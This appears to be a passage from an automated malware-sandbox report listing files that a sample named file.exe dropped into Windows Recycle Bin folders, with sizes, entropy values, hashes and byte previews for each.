                SHA1:A41B95C30CB23F4D2444B7981768B18E4565E108
                SHA-256:A6EBC8EFE44FF7C0F6D7C946AA75D57A28E6873274BA5F79A01A9DB598828076
                SHA-512:B2F57F63197B59803D5F5959394D2A8D379D0CA299DCBEA290DEC9143DB18DCEF64D0841CDDAD378594050C14EE039A5EF5961AC13A2B07633DDAFA2AE2D8595
                Malicious:false
                Preview:.a\...r.gx.Z...R=.pW.<..........:?.0z.;.Tv+.SY.Q...Q..GH...'.._.5J..e..`...v..+9~....eSq..9..eR......a.8..;....,.)e.'E.....

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\AAAAAAAAAAA (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\BBBBBBBBBBB (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\CCCCCCCCCCC (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\DDDDDDDDDDD (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\EEEEEEEEEEE (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\FFFFFFFFFFF (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\GGGGGGGGGGG (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\HHHHHHHHHHH (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\IIIIIIIIIII (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\JJJJJJJJJJJ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\KKKKKKKKKKK (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\LLLLLLLLLLL (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\MMMMMMMMMMM (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\NNNNNNNNNNN (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\OOOOOOOOOOO (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\PPPPPPPPPPP (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\QQQQQQQQQQQ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\RRRRRRRRRRR (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\SSSSSSSSSSS (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\TTTTTTTTTTT (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\UUUUUUUUUUU (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\VVVVVVVVVVV (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\WWWWWWWWWWW (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\XXXXXXXXXXX (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\YYYYYYYYYYY (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\ZZZZZZZZZZZ (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\desktop.ini

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.600222991790267
                Encrypted:false
                SSDEEP:3:I/4oR2vT/vtOoZtUtCs3ZgrE1MR6e69RksfTgDhkMpS+0bto:jZAxZgI1UYks7gDhkMMfK
                MD5:333F39247DFF41FE6EC2D159241AC39D
                SHA1:E51544FEBEA21BA0F65910320154635B1B1F11F3
                SHA-256:E436527C1C16CAB09EF812B961E0C24E5CA4E03A166F32330F16F0790D8E6B8D
                SHA-512:3E783CAF57ABAF97A55752AB5E3D9DA5258C011C042B91176D53A3F1F1BC91608E05B383B7CE0D7A40923DE035E6C133942BB54F91E5701ED940E3CBB37B0E1B
                Malicious:false
                Preview:[M}Z].....V.`..&b...H=g.#D...i....X.HYM....g.b.9/...*.P...r.B<[:6K...h........l...P..|t.W..\dH..E.).'.....[.xL.R*......%....&3

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\$I2EW2MR.pdf

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):94
                Entropy (8bit):6.206132601654616
                Encrypted:false
                SSDEEP:3:73Z+vMpz7Wqp29QWRPy3oV:7KMpXFp29QW6oV
                MD5:24F4652678561D01A65D857E6ACD9D88
                SHA1:6372996847C61E57247D1D58312A00D51ECAB2E9
                SHA-256:927D2E2FCFFCF3F93FD52E3B982835C2E54058C529BAB19ACB627DA390709681
                SHA-512:21ECCED023D62EBB139BC701AC20186440B9AD32F3CF1D1477DA02EBCEBE800E9BF7B1CBD20B7D5E4D298402C0B41CB1C10E2BAAE55FF8C5221AAFF7BC6EF3DC
                Malicious:false
                Preview:...i.]z$.jc....>.@....^..&....J...{n......*.`.ukY.(..........H6.I.tOR..%Aq.Q..sR?..Z{.

                C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\AAAAAAAAAAA (copy)

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):129
                Entropy (8bit):6.652586460799287
                Encrypted:false
